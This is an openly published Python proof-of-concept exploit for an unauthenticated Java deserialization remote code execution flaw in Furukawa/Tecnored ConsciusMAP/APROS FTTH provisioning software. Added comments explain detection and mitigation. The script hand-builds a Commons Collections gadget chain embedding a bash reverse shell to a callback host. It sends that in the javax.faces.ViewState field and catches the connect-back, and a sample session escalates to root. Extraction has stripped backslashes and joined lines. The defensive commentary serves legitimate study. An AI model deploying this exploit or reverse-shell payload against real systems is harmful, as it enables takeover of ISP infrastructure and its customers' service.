
Furukawa Electric ConsciusMAP 2.8.1 Java Deserialization Remote Code Execution


[*]#!/usr/bin/env python3[*]# -*- coding: utf-8 -*-[*]#[*]#[*]# Furukawa Electric ConsciusMAP 2.8.1 Java Deserialization Remote Code Execution[*]#[*]#[*]# Vendor: Furukawa Electric Co., Ltd. | Tecnored SA[*]# Product web page: https://www.furukawa.co.jp | https://www.tecnoredsa.com.ar[*]# Affected version: APROS Evolution | 2.8.1[*]# FURUKAWA | 2.7.10[*]# ConsciusMAP | 2.6.4[*]# | 2.3.1[*]# | 2.1.49[*]# | 2.1.36[*]# | 2.1.31[*]# | 2.1.18[*]# | 2.1.16[*]# | 2.1.15[*]# | 2.1.1[*]# | 2.0.1174[*]# | 1.8[*]# | 1.4.70[*]#[*]# Summary: Apros Evoluation / Furukawa / ConsciusMap is the Tecnored[*]# provisioning system for FTTH networks. Complete administration of[*]# your entire external FTTH network plant, including from the ONUs[*]# installed in each end customer, to the wiring and junction boxes.[*]# Unify all the management of your FTTH network on a single platform.[*]# Unify all your data, whether from customers, your network, or the[*]# external plant in one place. APROS FTTH allows you to manage your[*]# entire FTTH network in a simple and globalized way with just one[*]# click, without being a network expert. Includes services such as:[*]# bandwidth limitation, Turbo Internet for time plans, BURST Internet,[*]# QinQ for companies, and many more. General consumption graphics and[*]# per customer in real time. Captive Portal for cutting or suspension[*]# of the service.[*]#[*]# Desc: The FTTH provisioning solution suffers from an unauthenticated[*]# remote code execution vulnerability due to an unsafe deserialization[*]# of Java objects (ViewState) triggered via the 'javax.faces.ViewState'[*]# HTTP POST parameter. 
The deserialization can cause the vulnerable JSF[*]# web application to execute arbitrary Java functions, malicious Java[*]# bytecode, and system shell commands with root privileges.[*]#[*]# ===================================================================[*]# $ ./furukawa.py 172.16.0.1:8080 172.168.0.200 4444[*]# [*] Setting up valid URL path[*]# [*] Starting callback listener child thread[*]# [*] Starting handler on port 4444[*]# [*] Sending serialized object[*]# [*] Connection from 172.16.0.1:48446[*]# [*] You got shell![*]# tomcat7@zslab:/var/lib/tomcat7$ id[*]# uid=114(tomcat7) gid=124(tomcat7) grupos=124(tomcat7),1003(furukawa)[*]# tomcat7@zslab:/var/lib/tomcat7$ sudo su[*]# id[*]# uid=0(root) gid=0(root) grupos=0(root)[*]# exit[*]# tomcat7@zslab:/var/lib/tomcat7$ exit[*]# *** Connection closed by remote host ***[*]# ===================================================================[*]#[*]# Tested on: Apache Tomcat/7.0.68[*]# Apache Tomcat/7.0.52[*]# Apache MyFaces/2.2.1[*]# Apache MyFaces/2.1.17[*]# Apache MyFaces/2.0.10[*]# GNU/Linux 4.4.0-173[*]# GNU/Linux 4.4.0-137[*]# GNU/Linux 4.4.0-101[*]# GNU/Linux 4.4.0-83[*]# GNU/Linux 3.15.0[*]# GNU/Linux 3.13.0-32[*]# PrimeFaces/4.0.RC1[*]# Apache-Coyote/1.1[*]# ACC Library 3.1[*]# Ubuntu 16.04.2[*]# Ubuntu 14.04.2[*]# Java/1.8.0_242[*]# Java/1.8.0_181[*]# Java/1.8.0_131[*]# Java/1.7.0_79[*]# MySQL 5.7.29[*]# MySQL 5.7.18[*]#[*]#[*]# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic[*]# Macedonian Information Security Research and Development Laboratory[*]# Zero Science Lab - https://www.zeroscience.mk - @zeroscience[*]#[*]#[*]# Advisory ID: ZSL-2020-5565[*]# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5565.php[*]#[*]# CVE ID: CVE-2020-12133[*]# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-12133[*]#[*]#[*]# 24.02.2020[*]#

import os#############[*]import sys############[*]import gzip#######o###[*]import zlib###########[*]import socket#########[*]import base64#########[*]import urllib#########[*]import requests#######[*]import telnetlib######[*]import threading######[*]import subprocess#####

from io import BytesIO[*]from time import sleep[*]from flash import blic

# PoC driver class reproduced from the advisory header above (ZSL-2020-5565,
# CVE-2020-12133). The code is kept exactly as extracted, including the "[*]"
# line-join artifacts and the byte literals whose backslashes were stripped;
# the comments read it for what a defender needs (what the request looks like
# on the wire and which controls stop it), not to make it runnable.
class Optics:

# Per-run state, filled in later by par() / check() / gadget():
#   callback, lport - address and port the PoC listens on for the connect-back
#   target, path    - base URL from argv and the context path chosen by check()
#   headers         - the fixed HTTP headers used for the POST
#   payload         - initialised here but never used: gadget() builds a local
#                     variable of the same name instead
#   cmd             - the shell command string embedded in the serialized object
# (gadget() also assigns self.paramz, which is not initialised here.)
def __init__(self):[*]self.callback = None#[*]self.headers = None##[*]self.payload = None##[*]self.target = None###[*]self.lport = None####[*]self.path = None#####[*]self.cmd = None######

# Listener half of the PoC, run on a worker thread by thricer(): binds a TCP
# socket on every interface at self.lport, waits up to 8 s for a single
# inbound connection and then hands that socket to telnetlib for an
# interactive session. The connection *from the application server to an
# arbitrary external host/port* is the observable event here: egress
# filtering on the Tomcat host, or an alert on outbound connections made by
# the tomcat service account, defeats this PoC independently of the
# deserialization flaw itself.
# NOTE(review): on accept() timeout the code closes the socket and calls
# exit(0) from inside the worker thread; in CPython that raises SystemExit in
# this thread only, so the request already sent by gadget() is unaffected.
def allears(self):[*]telnetus = telnetlib.Telnet()[*]print("[*] Starting handler on port {}".format(self.lport))[*]s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)[*]s.bind(("0.0.0.0", self.lport))[*]while True:[*]try:[*]s.settimeout(8)[*]s.listen(1)[*]conn, addr = s.accept()[*]print("[*] Connection from {}:{}".format(addr[0], addr[1]))[*]telnetus.sock = conn[*]except socket.timeout as p:[*]print("[!] Probably not vulnerable... ({poraka})".format(poraka=p))[*]print("[+] Check your port mappings.")[*]s.close()[*]exit(0)[*]break

# Reached only after accept() returned a connection.
print("[*] You got shell!")

# Author's note on a local telnetlib encoding workaround (left unchanged).
#[*]# UnicodeDecodeError dirty fix:[*]# /usr/lib/python3.6/telnetlib.py[*]# Change from 'ascii' to 'utf-8' (Lines: 553 and 556)[*]#

# Interactive bridge between the local terminal and the accepted socket.
telnetus.interact()[*]conn.close()

# Orchestrates the two halves: starts allears() on a thread named "ZSL",
# sleeps one second so the listener has time to bind, then calls gadget()
# on the main thread to send the request. The fixed sleep is the only
# synchronisation between the two.
def thricer(self):[*]print("[*] Starting callback listener child thread")[*]konac = threading.Thread(name="ZSL", target=self.allears)[*]konac.start()[*]sleep(1)[*]self.gadget()

# Builds and sends the malicious javax.faces.ViewState described in the
# advisory header. Read top to bottom:
#   1. self.cmd - a bash one-liner that connects back to callback:lport
#                 ("${IFS}" stands in for a space).
#   2. payload  - a hand-assembled Java serialization stream. Decoding the
#                 hex gives the stream magic AC ED 00 05 followed by
#                 java.util.HashSet, org.apache.commons.collections.keyvalue
#                 .TiedMapEntry, ...map.LazyMap, ...functors.ChainedTransformer
#                 / ConstantTransformer / InvokerTransformer and
#                 java.lang.Runtime getRuntime/getMethod/invoke/exec, i.e. the
#                 well-known Commons Collections 3.x transformer chain;
#                 self.cmd is spliced in as a one-byte-length-prefixed string.
#   3. The stream is gzip-compressed, base64-encoded and POSTed as the
#      javax.faces.ViewState form field to self.target + self.path.
# Defensive reading of this code:
#   - Detection: a ViewState value that base64/gzip-decodes to a stream
#     starting with AC ED 00 05 and naming InvokerTransformer is the signal.
#     The "User-Agent: ISP-Eye/2.51" and "Accept: ...;q=1.pwn" headers
#     fingerprint this particular PoC but are trivially changed, so they are
#     a bonus indicator, not a control.
#   - Mitigation: the chain only works when the server deserializes
#     client-supplied ViewState without integrity protection and has a
#     vulnerable Commons Collections on the classpath. Server-side state
#     saving or MyFaces ViewState encryption+MAC, a JVM deserialization
#     filter (jdk.serialFilter, available on the Java 8 builds listed), and
#     upgrading/removing commons-collections each break it independently.
# NOTE(review): the "Tested on" list names "ACC Library 3.1" and MyFaces 2.x;
# whether those deployments had ViewState encryption disabled or used a
# default secret is not stated in the advisory - confirm before relying on
# the MyFaces setting alone.
def gadget(self):[*]self.cmd = "/bin/bash -c /bin/bash${IFS}-i>&/dev/tcp/"[*]self.cmd += self.callback[*]self.cmd += "/"[*]self.cmd += str(self.lport)[*]self.cmd += "< &1"

# The stripped backslashes below ("x6A" where the original read "\x6A") are
# an extraction artifact of the page and are left as found; the three
# physical lines are one continued statement run in the original.
payload = b"xACxEDx00x05x73x72x00x11x6Ax61x76x61x2Ex75x74x69x6C"[*]payload += b"x2Ex48x61x73x68x53x65x74xBAx44x85x95x96xB8xB7x34x03"[*]payload += b"x00x00x78x70x77x0Cx00x00x00x02x3Fx40x00x00x00x00x00"[*]payload += b"x01x73x72x00x34x6Fx72x67x2Ex61x70x61x63x68x65x2Ex63"[*]payload += b"x6Fx6Dx6Dx6Fx6Ex73x2Ex63x6Fx6Cx6Cx65x63x74x69x6Fx6E"[*]payload += b"x73x2Ex6Bx65x79x76x61x6Cx75x65x2Ex54x69x65x64x4Dx61"[*]payload += b"x70x45x6Ex74x72x79x8AxADxD2x9Bx39xC1x1FxDBx02x00x02"[*]payload += b"x4Cx00x03x6Bx65x79x74x00x12x4Cx6Ax61x76x61x2Fx6Cx61"[*]payload += b"x6Ex67x2Fx4Fx62x6Ax65x63x74x3Bx4Cx00x03x6Dx61x70x74"[*]payload += b"x00x0Fx4Cx6Ax61x76x61x2Fx75x74x69x6Cx2Fx4Dx61x70x3B"[*]payload += b"x78x70x74x00x26x68x74x74x70x73x3Ax2Fx2Fx67x69x74x68"[*]payload += b"x75x62x2Ex63x6Fx6Dx2Fx6Ax6Fx61x6Fx6Dx61x74x6Fx73x66"[*]payload += b"x2Fx6Ax65x78x62x6Fx73x73x20x73x72x00x2Ax6Fx72x67x2E"[*]payload += b"x61x70x61x63x68x65x2Ex63x6Fx6Dx6Dx6Fx6Ex73x2Ex63x6F"[*]payload += b"x6Cx6Cx65x63x74x69x6Fx6Ex73x2Ex6Dx61x70x2Ex4Cx61x7A"[*]payload += b"x79x4Dx61x70x6ExE5x94x82x9Ex79x10x94x03x00x01x4Cx00"[*]payload += b"x07x66x61x63x74x6Fx72x79x74x00x2Cx4Cx6Fx72x67x2Fx61"[*]payload += b"x70x61x63x68x65x2Fx63x6Fx6Dx6Dx6Fx6Ex73x2Fx63x6Fx6C"[*]payload += b"x6Cx65x63x74x69x6Fx6Ex73x2Fx54x72x61x6Ex73x66x6Fx72"[*]payload += b"x6Dx65x72x3Bx78x70x73x72x00x3Ax6Fx72x67x2Ex61x70x61"[*]payload += b"x63x68x65x2Ex63x6Fx6Dx6Dx6Fx6Ex73x2Ex63x6Fx6Cx6Cx65"[*]payload += b"x63x74x69x6Fx6Ex73x2Ex66x75x6Ex63x74x6Fx72x73x2Ex43"[*]payload += b"x68x61x69x6Ex65x64x54x72x61x6Ex73x66x6Fx72x6Dx65x72"[*]payload += b"x30xC7x97xECx28x7Ax97x04x02x00x01x5Bx00x0Dx69x54x72"[*]payload += b"x61x6Ex73x66x6Fx72x6Dx65x72x73x74x00x2Dx5Bx4Cx6Fx72"[*]payload += b"x67x2Fx61x70x61x63x68x65x2Fx63x6Fx6Dx6Dx6Fx6Ex73x2F"[*]payload += b"x63x6Fx6Cx6Cx65x63x74x69x6Fx6Ex73x2Fx54x72x61x6Ex73"[*]payload += b"x66x6Fx72x6Dx65x72x3Bx78x70x75x72x00x2Dx5Bx4Cx6Fx72"[*]payload += b"x67x2Ex61x70x61x63x68x65x2Ex63x6Fx6Dx6Dx6Fx6Ex73x2E"[*]payload += 
b"x63x6Fx6Cx6Cx65x63x74x69x6Fx6Ex73x2Ex54x72x61x6Ex73"[*]payload += b"x66x6Fx72x6Dx65x72x3BxBDx56x2AxF1xD8x34x18x99x02x00"[*]payload += b"x00x78x70x00x00x00x05x73x72x00x3Bx6Fx72x67x2Ex61x70"[*]payload += b"x61x63x68x65x2Ex63x6Fx6Dx6Dx6Fx6Ex73x2Ex63x6Fx6Cx6C"[*]payload += b"x65x63x74x69x6Fx6Ex73x2Ex66x75x6Ex63x74x6Fx72x73x2E"[*]payload += b"x43x6Fx6Ex73x74x61x6Ex74x54x72x61x6Ex73x66x6Fx72x6D"[*]payload += b"x65x72x58x76x90x11x41x02xB1x94x02x00x01x4Cx00x09x69"[*]payload += b"x43x6Fx6Ex73x74x61x6Ex74x71x00x7Ex00x03x78x70x76x72"[*]payload += b"x00x11x6Ax61x76x61x2Ex6Cx61x6Ex67x2Ex52x75x6Ex74x69"[*]payload += b"x6Dx65x00x00x00x00x00x00x00x00x00x00x00x78x70x73x72"[*]payload += b"x00x3Ax6Fx72x67x2Ex61x70x61x63x68x65x2Ex63x6Fx6Dx6D"[*]payload += b"x6Fx6Ex73x2Ex63x6Fx6Cx6Cx65x63x74x69x6Fx6Ex73x2Ex66"[*]payload += b"x75x6Ex63x74x6Fx72x73x2Ex49x6Ex76x6Fx6Bx65x72x54x72"[*]payload += b"x61x6Ex73x66x6Fx72x6Dx65x72x87xE8xFFx6Bx7Bx7CxCEx38"[*]payload += b"x02x00x03x5Bx00x05x69x41x72x67x73x74x00x13x5Bx4Cx6A"[*]payload += b"x61x76x61x2Fx6Cx61x6Ex67x2Fx4Fx62x6Ax65x63x74x3Bx4C"[*]payload += b"x00x0Bx69x4Dx65x74x68x6Fx64x4Ex61x6Dx65x74x00x12x4C"[*]payload += b"x6Ax61x76x61x2Fx6Cx61x6Ex67x2Fx53x74x72x69x6Ex67x3B"[*]payload += b"x5Bx00x0Bx69x50x61x72x61x6Dx54x79x70x65x73x74x00x12"[*]payload += b"x5Bx4Cx6Ax61x76x61x2Fx6Cx61x6Ex67x2Fx43x6Cx61x73x73"[*]payload += b"x3Bx78x70x75x72x00x13x5Bx4Cx6Ax61x76x61x2Ex6Cx61x6E"[*]payload += b"x67x2Ex4Fx62x6Ax65x63x74x3Bx90xCEx58x9Fx10x73x29x6C"[*]payload += b"x02x00x00x78x70x00x00x00x02x74x00x0Ax67x65x74x52x75"[*]payload += b"x6Ex74x69x6Dx65x75x72x00x12x5Bx4Cx6Ax61x76x61x2Ex6C"[*]payload += b"x61x6Ex67x2Ex43x6Cx61x73x73x3BxABx16xD7xAExCBxCDx5A"[*]payload += b"x99x02x00x00x78x70x00x00x00x00x74x00x09x67x65x74x4D"[*]payload += b"x65x74x68x6Fx64x75x71x00x7Ex00x1Bx00x00x00x02x76x72"[*]payload += b"x00x10x6Ax61x76x61x2Ex6Cx61x6Ex67x2Ex53x74x72x69x6E"[*]payload += b"x67xA0xF0xA4x38x7Ax3BxB3x42x02x00x00x78x70x76x71x00"[*]payload += 
b"x7Ex00x1Bx73x71x00x7Ex00x13x75x71x00x7Ex00x18x00x00"[*]payload += b"x00x02x70x75x71x00x7Ex00x18x00x00x00x00x74x00x06x69"[*]payload += b"x6Ex76x6Fx6Bx65x75x71x00x7Ex00x1Bx00x00x00x02x76x72"[*]payload += b"x00x10x6Ax61x76x61x2Ex6Cx61x6Ex67x2Ex4Fx62x6Ax65x63"[*]payload += b"x74x00x00x00x00x00x00x00x00x00x00x00x78x70x76x71x00"[*]payload += b"x7Ex00x18x73x71x00x7Ex00x13x75x72x00x13x5Bx4Cx6Ax61"[*]payload += b"x76x61x2Ex6Cx61x6Ex67x2Ex53x74x72x69x6Ex67x3BxADxD2"[*]payload += b"x56xE7xE9x1Dx7Bx47x02x00x00x78x70x00x00x00x01x74x00"[*]payload += (bytes(chr(len(self.cmd)), "utf-8"))##################################"[*]payload += (bytes(self.cmd, "utf-8"))############################################"[*]payload += b"x74x00x04x65x78x65x63x75x71x00x7Ex00x1Bx00x00x00x01"[*]payload += b"x71x00x7Ex00x20x73x71x00x7Ex00x0Fx73x72x00x11x6Ax61"[*]payload += b"x76x61x2Ex6Cx61x6Ex67x2Ex49x6Ex74x65x67x65x72x12xE2"[*]payload += b"xA0xA4xF7x81x87x38x02x00x01x49x00x05x76x61x6Cx75x65"[*]payload += b"x78x72x00x10x6Ax61x76x61x2Ex6Cx61x6Ex67x2Ex4Ex75x6D"[*]payload += b"x62x65x72x86xACx95x1Dx0Bx94xE0x8Bx02x00x00x78x70x00"[*]payload += b"x00x00x01x73x72x00x11x6Ax61x76x61x2Ex75x74x69x6Cx2E"[*]payload += b"x48x61x73x68x4Dx61x70x05x07xDAxC1xC3x16x60xD1x03x00"[*]payload += b"x02x46x00x0Ax6Cx6Fx61x64x46x61x63x74x6Fx72x49x00x09"[*]payload += b"x74x68x72x65x73x68x6Fx6Cx64x78x70x3Fx40x00x00x00x00"[*]payload += b"x00x00x77x08x00x00x00x10x00x00x00x00x78x78x78"#######"

# Compress + encode: the value that travels in the form field is
# base64(gzip(stream)), which is why a detector has to undo both layers
# before looking for the AC ED 00 05 magic.
jbits = BytesIO()[*]with gzip.GzipFile(fileobj=jbits, mode="wb") as f:[*]f.write(payload)[*]serialize = base64.b64encode(jbits.getvalue())[*]print("[*] Sending serialized object")

# Fixed request headers; the non-numeric q-value and the User-Agent are
# fingerprints of this PoC only, not of the vulnerability.
self.headers = {[*]"Accept" : "text/html,application/xhtml+xml,application/xml;q=1.pwn",[*]"Content-Type" : "application/x-www-form-urlencoded",[*]"User-Agent" : "ISP-Eye/2.51",[*]"Connection" : "keep-alive"}

# Single POST carrying the object in the javax.faces.ViewState field; the
# response is bound to r but never inspected (success is judged solely by
# whether allears() receives a connection).
self.paramz={"javax.faces.ViewState" : serialize}[*]#sleep(1)[*]r = requests.post(self.target + self.path, headers=self.headers, data=self.paramz)

# Reads the three positional arguments (target[:port], callback address,
# callback port) from sys.argv; any other argument count prints usage and
# exits. The scheme check is a plain substring test for "http", so a value
# that merely contains "http" anywhere passes through unchanged.
def par(self):[*]if len(sys.argv) != 4:[*]self.usage()[*]else: [*]self.target = sys.argv[1][*]self.callback = sys.argv[2][*]self.lport = int(sys.argv[3])[*]if not "http" in self.target:[*]self.target = "http://{}".format(self.target)

# Fingerprints the target with a GET to its root and picks the JSF context
# path from the words "FURUKAWA" / "APROS" in the response body. Because the
# first `if` already exits when neither word is present, the trailing
# `else: exit(-1337)` can never be reached. Any exception is swallowed into
# one generic message and exit(0); its "n--n" was presumably "\n--\n" before
# the backslashes were lost in extraction.
def check(self):[*]print("[*] Setting up valid URL path")[*]try:[*]r = requests.get(self.target)[*]app = r.text[*]if not "FURUKAWA" in app and not "APROS" in app:[*]print("[!] App not detected.")[*]exit(0)[*]if "FURUKAWA" in app:[*]self.path = "/FURUKAWA/"[*]elif "APROS" in app:[*]self.path = "/APROS/"[*]else:[*]exit(-1337)[*]except Exception as p:[*]print("[!] Somethingz wrong: n--n{poraka}".format(poraka=p))[*]exit(0)

# Prints the advisory banner (product names and the ZSL-2020-5565 id). No
# logic; the box-drawing is a triple-quoted literal whose line breaks were
# replaced by "[*]" during extraction.
def framed(self):[*]naslov = """[*]o===--------------------------------------===o[*]| |[*]| Furukawa Electric / Tecnored |[*]| APROS Evolution | FURUKAWA | ConsciusMAP |[*]| Fiber-To-The-Home (FTTH) |[*]| |[*]| Java Deserialization Remote Code Execution |[*]| ZSL-2020-5565 |[*]| |[*]o===--------------------------------------===o[*]||[*]||[*](__/)||[*](•ㅅ•)||[*]/   づ|[*]"""[*]print(naslov)

# Prints the banner and usage text, then exits. On this page the "Usage:"
# line is empty after the script name; the angle-bracket placeholders for the
# three arguments were most likely stripped as HTML tags during extraction
# (the Example line still shows all three), and "4444n" is "4444\n" with the
# backslash lost.
def usage(self):[*]self.framed()[*]print("Usage: ./furukawa.py ")[*]print("Example: ./furukawa.py 172.16.0.1:8080 172.16.0.200 4444n")[*]exit(0)

# Entry sequence: parse arguments, fingerprint the target and choose the
# context path, then start the listener thread and send the request. The
# trailing "###()" runs are alignment comments from the original, joined
# onto one line by extraction.
def main(self):[*]self.par()########()[*]self.check()######()[*]self.thricer()####()

# Script entry point: instantiate the driver and run main() when executed
# directly (not when imported).
if __name__ == '__main__':[*]Optics().main()[*]
